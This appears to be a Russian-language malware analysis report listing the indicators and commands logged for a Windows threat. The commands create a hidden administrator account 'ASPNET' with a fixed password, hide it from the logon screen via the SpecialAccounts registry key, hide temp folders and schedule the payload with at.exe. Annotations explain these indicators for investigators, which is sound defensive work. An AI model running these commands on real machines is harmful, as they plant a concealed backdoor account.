Техническая информация
- %WINDIR%\Tasks\At1.job
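- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s /add ASPNET
  (Примечание: «%USERNAME%s», по-видимому, появилось из-за автоматической замены имени пользователя на переменную в отчёте; судя по запросу имени группы с SID S-1-5-32-544 ниже, учётная запись ASPNET добавляется в локальную группу администраторов.)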
- '<SYSTEM32>\attrib.exe' +h %WINDIR%\TEMP\ztmp
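- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ASPNET /t REG_DWORD /d 0 /f
  (Примечание: значение 0 в разделе SpecialAccounts\UserList скрывает учётную запись ASPNET с экрана входа в систему; появление такого параметра для недавно созданной учётной записи стоит проверять при расследовании.)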
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f
- '<SYSTEM32>\find.exe' "="
- '<SYSTEM32>\at.exe' 10:59 "<Полный путь к вирусу>" ~
- '<SYSTEM32>\attrib.exe' +h %TEMP%\ztmp
- '<SYSTEM32>\wbem\wmic.exe' Group Where "SID = 'S-1-5-32-544'" Get Name /Value
- '<SYSTEM32>\net1.exe' user ASPNET 1Adgjm /add
- %TEMP%\tmp4.tmp
- <SYSTEM32>\wbem\AutoRecover\C8463ECBE33BC240263A0B094E46D510.mof
- %WINDIR%\Temp\tmp3.tmp
- %WINDIR%\Temp\tmp6.tmp
- <SYSTEM32>\wbem\AutoRecover\23BDE61F1F4FACE17E9B0C01F2A1FD9B.mof
- %WINDIR%\Temp\tmp5.tmp
- %TEMP%\tmp1.tmp
- %TEMP%\ztmp\tmp2062.exe
- %TEMP%\ztmp\tmp1762.bat
- %WINDIR%\Temp\ztmp\tmp9416.exe
- %WINDIR%\Temp\ztmp\tmp7649.bat
- %TEMP%\tmp2.tmp
- %WINDIR%\Temp\tmp6.tmp
- %WINDIR%\Temp\tmp5.tmp
- %WINDIR%\Tasks\At1.job
- %WINDIR%\Temp\ztmp\tmp9416.exe
- %TEMP%\ztmp\tmp2062.exe
- %TEMP%\tmp2.tmp
- %TEMP%\tmp1.tmp
- %TEMP%\tmp4.tmp
- %WINDIR%\Temp\tmp3.tmp